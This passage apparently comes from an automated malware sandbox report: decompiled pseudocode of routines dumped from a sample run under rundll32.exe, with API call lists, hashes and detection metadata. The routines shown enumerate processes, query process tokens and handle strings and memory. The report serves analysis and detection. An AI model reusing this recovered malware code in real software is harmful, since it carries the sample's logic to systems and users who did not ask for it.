							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2b9c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x02b9487a
                                                          0x02b9487e
                                                          0x02b94880
                                                          0x02b94881
                                                          0x02b94889
                                                          0x02b94889
                                                          0x02b9488d
                                                          0x00000000
                                                          0x00000000
                                                          0x02b94884
                                                          0x02b94885
                                                          0x02b94888
                                                          0x02b94888
                                                          0x02b94895
                                                          0x02b9489a
                                                          0x02b948a0
                                                          0x02b948a8
                                                          0x02b948ae
                                                          0x02b948b0
                                                          0x02b948b5
                                                          0x02b948b9
                                                          0x02b948bb
                                                          0x02b948be
                                                          0x02b948c5
                                                          0x02b948c5
                                                          0x02b948cf
                                                          0x02b948d2
                                                          0x02b948d3
                                                          0x02b948d5
                                                          0x02b948e1
                                                          0x02b948e1
                                                          0x02b948ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,069B95AC,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B94889
                                                          • StrTrimA.SHLWAPI(?,02B9C284,00000002,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948B3
                                                          • StrTrimA.SHLWAPI(00000001,02B9C284,?,02B95D25,?,02B9243F,069B95AC,?,02B95D25), ref: 02B948C5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: d3a610a70d4ff76458b673cdb937afae2d267888ffb1acbf5f383cc7794efb8a
                                                          • Instruction ID: 235e02da5c1b18761ad702447005ed8545cb6bf98a5b66a53314d1c5616f42c4
                                                          • Opcode Fuzzy Hash: d3a610a70d4ff76458b673cdb937afae2d267888ffb1acbf5f383cc7794efb8a
                                                          • Instruction Fuzzy Hash: 0B01DD71A453A25FD6219F66CC89F277FACFB46A94F110969F542C7340DB60D80285B4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E02B9A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2b9d2a8; // 0x3e1a5a8
						_t2 = _t9 + 0x2b9ee34; // 0x73617661
						_push( &_v264);
						if( *0x2b9d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x02b9a667
                                                          0x02b9a671
                                                          0x02b9a675
                                                          0x02b9a67f
                                                          0x02b9a6b0
                                                          0x02b9a686
                                                          0x02b9a68b
                                                          0x02b9a698
                                                          0x02b9a6a1
                                                          0x02b9a6b8
                                                          0x02b9a6a3
                                                          0x02b9a6ab
                                                          0x00000000
                                                          0x02b9a6ab
                                                          0x02b9a6b9
                                                          0x02b9a6ba
                                                          0x00000000
                                                          0x02b9a6ba
                                                          0x00000000
                                                          0x02b9a6b4
                                                          0x02b9a6c0
                                                          0x02b9a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02B9A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 02B9A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 02B9A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 02B9A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: c0be49824b0f28f90193807a2bd5459d5f5b8f48285ddb23a740badd381a42a7
                                                          • Instruction ID: 1494955207eddc181f36789882197a23232fd8ac76c44cd978d59c973232554b
                                                          • Opcode Fuzzy Hash: c0be49824b0f28f90193807a2bd5459d5f5b8f48285ddb23a740badd381a42a7
                                                          • Instruction Fuzzy Hash: 73F0B4366011256BDF20FBBB9D49EEB7BADDBC5350F0101F2E909C3240EB20CA558AA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B96840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x02b9684a
                                                          0x02b9684e
                                                          0x02b96863
                                                          0x02b96865
                                                          0x02b9686a
                                                          0x02b96870
                                                          0x02b96872
                                                          0x02b96877
                                                          0x02b96882
                                                          0x02b96879
                                                          0x02b96879
                                                          0x02b96879
                                                          0x02b96877
                                                          0x02b96890

                                                          APIs
                                                          • memset.NTDLL ref: 02B9684E
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 02B96863
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02B96870
                                                          • CloseHandle.KERNEL32(?), ref: 02B96882
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: b27d98668579dae1ca0f0c0beb056ce9f6d81323c3970804a9ccb5a5eb63a2e7
                                                          • Instruction ID: 8510774f9d3bb283f874ec59316a6a3523cb6abe0c12dea3f3b8f396956e2e30
                                                          • Opcode Fuzzy Hash: b27d98668579dae1ca0f0c0beb056ce9f6d81323c3970804a9ccb5a5eb63a2e7
                                                          • Instruction Fuzzy Hash: EBF05EF15443087FD7206F26DCC4C27BBACEB9529DB114A7EF14282111D672A8198E60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B923F4, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E02B923F4(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2b9d32c; // 0x69b95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2b9d32c; // 0x69b95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2b9d030) {
					HeapFree( *0x2b9d238, 0, _t8);
				}
				_t14[1] = E02B9486F(_v0, _t14);
				_t11 =  *0x2b9d32c; // 0x69b95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                          0x02b923f4
                                                          0x02b923f4
                                                          0x02b923fd
                                                          0x02b9240d
                                                          0x02b9240d
                                                          0x02b92412
                                                          0x02b92417
                                                          0x00000000
                                                          0x00000000
                                                          0x02b92407
                                                          0x02b92407
                                                          0x02b92419
                                                          0x02b9241d
                                                          0x02b9242f
                                                          0x02b9242f
                                                          0x02b9243f
                                                          0x02b92442
                                                          0x02b92447
                                                          0x02b9244b
                                                          0x02b92451

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B923FD
                                                          • Sleep.KERNEL32(0000000A,?,02B95D25), ref: 02B92407
                                                          • HeapFree.KERNEL32(00000000,00000000,?,02B95D25), ref: 02B9242F
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B9244B
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: eebaad57670dd6c904f99b3a192c99374797fd05fcb75cc0bda26f17c910ec5d
                                                          • Instruction ID: fef4f23f4f1c7f97555c2a59b93daab2353b623d5feb510cd46c0370596f65b8
                                                          • Opcode Fuzzy Hash: eebaad57670dd6c904f99b3a192c99374797fd05fcb75cc0bda26f17c910ec5d
                                                          • Instruction Fuzzy Hash: 91F0FE71E84141ABDB14AF79DB48F167BE4EF1D781F04C855FA41C7250C720E861CB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B91B42, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B91B42() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2b9d26c; // 0x2e0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2b9d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2b9d26c; // 0x2e0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2b9d238; // 0x65c0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x02b91b42
                                                          0x02b91b49
                                                          0x02b91b93
                                                          0x02b91b95
                                                          0x02b91b95
                                                          0x02b91b4d
                                                          0x02b91b53
                                                          0x02b91b58
                                                          0x02b91b5c
                                                          0x02b91b62
                                                          0x02b91b69
                                                          0x00000000
                                                          0x00000000
                                                          0x02b91b6b
                                                          0x02b91b70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b91b70
                                                          0x02b91b72
                                                          0x02b91b7a
                                                          0x02b91b7d
                                                          0x02b91b7d
                                                          0x02b91b83
                                                          0x02b91b8a
                                                          0x02b91b8d
                                                          0x02b91b8d
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002E0,00000001,02B94F0E), ref: 02B91B4D
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 02B91B5C
                                                          • CloseHandle.KERNEL32(000002E0), ref: 02B91B7D
                                                          • HeapDestroy.KERNEL32(065C0000), ref: 02B91B8D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: abd60e90540ec9d801bdeb75c4aed127cbaae611e9120641fb7073124a9d3554
                                                          • Instruction ID: e1cc98cfc536b103cece264cb0f0b8c52b1d9ca75449dea6dcd28969e9835d19
                                                          • Opcode Fuzzy Hash: abd60e90540ec9d801bdeb75c4aed127cbaae611e9120641fb7073124a9d3554
                                                          • Instruction Fuzzy Hash: 04F03071F9131397DF106F3EEA48E163B99EB08BE5B040A61F808D7290EB30C450A660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96702, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E02B96702() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2b9d32c; // 0x69b95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2b9d32c; // 0x69b95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2b9d32c; // 0x69b95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2b9e81a) {
					HeapFree( *0x2b9d238, 0, _t10);
					_t7 =  *0x2b9d32c; // 0x69b95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x02b96702
                                                          0x02b9670b
                                                          0x02b9671b
                                                          0x02b9671b
                                                          0x02b96720
                                                          0x02b96725
                                                          0x00000000
                                                          0x00000000
                                                          0x02b96715
                                                          0x02b96715
                                                          0x02b96727
                                                          0x02b9672c
                                                          0x02b96730
                                                          0x02b96743
                                                          0x02b96749
                                                          0x02b96749
                                                          0x02b96752
                                                          0x02b96754
                                                          0x02b96758
                                                          0x02b9675e

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B9670B
                                                          • Sleep.KERNEL32(0000000A,?,02B95D25), ref: 02B96715
                                                          • HeapFree.KERNEL32(00000000,?,?,02B95D25), ref: 02B96743
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B96758
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f43467e877b899e6b005e8d820df8180442915e69d15a13583abb65bea9aa26
                                                          • Instruction ID: 2262b9cc6d8cf1017829ba97cb650ee8f0306c949c9ac73562ef449c8cc7771d
                                                          • Opcode Fuzzy Hash: 6f43467e877b899e6b005e8d820df8180442915e69d15a13583abb65bea9aa26
                                                          • Instruction Fuzzy Hash: 62F0F874E841019FEB18DF75DA99F157BE9EB08781B45C86AFA02C7360C735E820CE24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B95AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E02B95AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02B9A71F(_t2);
				if(_t34 != 0) {
					_t30 = E02B9A71F(_t28);
					if(_t30 == 0) {
						E02B9A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02B9A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02B9A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x02b95af1
                                                          0x02b95afb
                                                          0x02b95afd
                                                          0x02b95b03
                                                          0x02b95b03
                                                          0x02b95b0c
                                                          0x02b95b10
                                                          0x02b95b1c
                                                          0x02b95b20
                                                          0x02b95b94
                                                          0x02b95b22
                                                          0x02b95b22
                                                          0x02b95b26
                                                          0x02b95b2b
                                                          0x02b95b30
                                                          0x02b95b4a
                                                          0x02b95b39
                                                          0x02b95b39
                                                          0x02b95b3d
                                                          0x02b95b40
                                                          0x02b95b45
                                                          0x02b95b45
                                                          0x02b95b4f
                                                          0x02b95b77
                                                          0x02b95b7d
                                                          0x02b95b80
                                                          0x02b95b51
                                                          0x02b95b53
                                                          0x02b95b5b
                                                          0x02b95b66
                                                          0x02b95b6b
                                                          0x02b95b6b
                                                          0x02b95b87
                                                          0x02b95b8e
                                                          0x02b95b8f
                                                          0x02b95b8f
                                                          0x02b95b20
                                                          0x02b95b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000), ref: 02B95AFD
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                            • Part of subcall function 02B9A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02B95B2B,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102), ref: 02B9A790
                                                            • Part of subcall function 02B9A782: StrChrA.SHLWAPI(?,0000003F,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B9A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?), ref: 02B95B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B77
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 5621bd8d45aa7d05b55bf569b43ecd6fac11d1c675b5182bb456bd9bc3bfb213
                                                          • Instruction ID: 89ca006f6cd84ddd98d48d74c4874e7776bf3e4568e5ae460bfd321ae1084f8f
                                                          • Opcode Fuzzy Hash: 5621bd8d45aa7d05b55bf569b43ecd6fac11d1c675b5182bb456bd9bc3bfb213
                                                          • Instruction Fuzzy Hash: 5921A2B6504215EBCF226F74CC94A9ABFBAEF06394F5480A5F9059F211D735D910CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B945C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B945C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02B9A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x02b945db
                                                          0x02b945df
                                                          0x02b945e9
                                                          0x02b945ee
                                                          0x02b945f3
                                                          0x02b945f5
                                                          0x02b945fd
                                                          0x02b94602
                                                          0x02b94610
                                                          0x02b94615
                                                          0x02b9461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,069B935C,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945D6
                                                          • lstrlenW.KERNEL32(02B98D93,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945DD
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945FD
                                                          • memcpy.NTDLL(74B069A0,02B98D93,00000002,00000000,004F0053,74B069A0,?,?,02B98D93,004F0053,069B935C), ref: 02B94610
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: eebb0ff949574f479b225e3240b31e3499aa1b8b16c89c07259a8372e86a5cb4
                                                          • Instruction ID: efcea46a3224e379983bc8d781a0ef7fe48d2046af273cc9b9cf8d7eee0c283b
                                                          • Opcode Fuzzy Hash: eebb0ff949574f479b225e3240b31e3499aa1b8b16c89c07259a8372e86a5cb4
                                                          • Instruction Fuzzy Hash: 9EF0F976900119BBCF11EFA9CC85C9F7BADEF0929471584A2EA04D7201E735EA159BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                          • lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 395717869101265d1052a27e77e787bcb526ba35c3dd1e6fc77cd5e21d3a34c9
                                                          • Instruction ID: f8494e84cebb22165361a95784a105d9ab6997c05e6b42f9f1e186d40c6a9e81
                                                          • Opcode Fuzzy Hash: 395717869101265d1052a27e77e787bcb526ba35c3dd1e6fc77cd5e21d3a34c9
                                                          • Instruction Fuzzy Hash: 87E01273901621678B11ABE5AD48C5BBFADEF8D691B040867F600D3110C72598258BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 6468 Parent PID: 1112 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 04955A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04955A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E0495A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0495A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x04955a34
                                                          0x04955a35
                                                          0x04955a36
                                                          0x04955a37
                                                          0x04955a38
                                                          0x04955a3c
                                                          0x04955a43
                                                          0x04955a52
                                                          0x04955a55
                                                          0x04955a58
                                                          0x04955a5f
                                                          0x04955a62
                                                          0x04955a65
                                                          0x04955a68
                                                          0x04955a6b
                                                          0x04955a76
                                                          0x04955a78
                                                          0x04955a81
                                                          0x04955a89
                                                          0x04955a8b
                                                          0x04955a9d
                                                          0x04955aa7
                                                          0x04955aab
                                                          0x04955aba
                                                          0x04955abe
                                                          0x04955ac7
                                                          0x04955acf
                                                          0x04955acf
                                                          0x04955ad1
                                                          0x04955ad1
                                                          0x04955ad9
                                                          0x04955adf
                                                          0x04955ae3
                                                          0x04955ae3
                                                          0x04955aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04955A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04955A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04955A9D
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04955ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04955AC7
                                                          • NtClose.NTDLL(?), ref: 04955AD9
                                                          • NtClose.NTDLL(00000000), ref: 04955AE3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
